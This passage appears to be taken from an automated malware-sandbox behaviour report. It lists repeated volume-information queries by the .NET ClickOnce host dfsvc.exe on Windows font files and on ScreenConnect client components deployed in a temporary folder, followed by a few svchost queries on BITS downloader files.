                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\T4CMJK9K.K3C\OOPO66OZ.RYH\ScreenConnect.Client.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\T4CMJK9K.K3C\OOPO66OZ.RYH\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\T4CMJK9K.K3C\OOPO66OZ.RYH\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\T4CMJK9K.K3C\OOPO66OZ.RYH\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\T4CMJK9K.K3C\OOPO66OZ.RYH\ScreenConnect.Core.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\T4CMJK9K.K3C\OOPO66OZ.RYH\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\T4CMJK9K.K3C\OOPO66OZ.RYH\ScreenConnect.Client.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\T4CMJK9K.K3C\OOPO66OZ.RYH\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\T4CMJK9K.K3C\OOPO66OZ.RYH\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\T4CMJK9K.K3C\OOPO66OZ.RYH\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\T4CMJK9K.K3C\OOPO66OZ.RYH\ScreenConnect.Core.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\T4CMJK9K.K3C\OOPO66OZ.RYH\ScreenConnect.ClientService.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\T4CMJK9K.K3C\OOPO66OZ.RYH\ScreenConnect.WindowsBackstageShell.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\T4CMJK9K.K3C\OOPO66OZ.RYH\ScreenConnect.WindowsFileManager.exe.config VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\T4CMJK9K.K3C\OOPO66OZ.RYH\ScreenConnect.WindowsClient.exe.config VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\T4CMJK9K.K3C\OOPO66OZ.RYH\ScreenConnect.WindowsBackstageShell.exe.config VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\T4CMJK9K.K3C\OOPO66OZ.RYH\ScreenConnect.WindowsFileManager.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\T4CMJK9K.K3C\OOPO66OZ.RYH\ScreenConnect.Client.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\T4CMJK9K.K3C\OOPO66OZ.RYH\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\T4CMJK9K.K3C\OOPO66OZ.RYH\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\T4CMJK9K.K3C\OOPO66OZ.RYH\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\T4CMJK9K.K3C\OOPO66OZ.RYH\ScreenConnect.Core.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
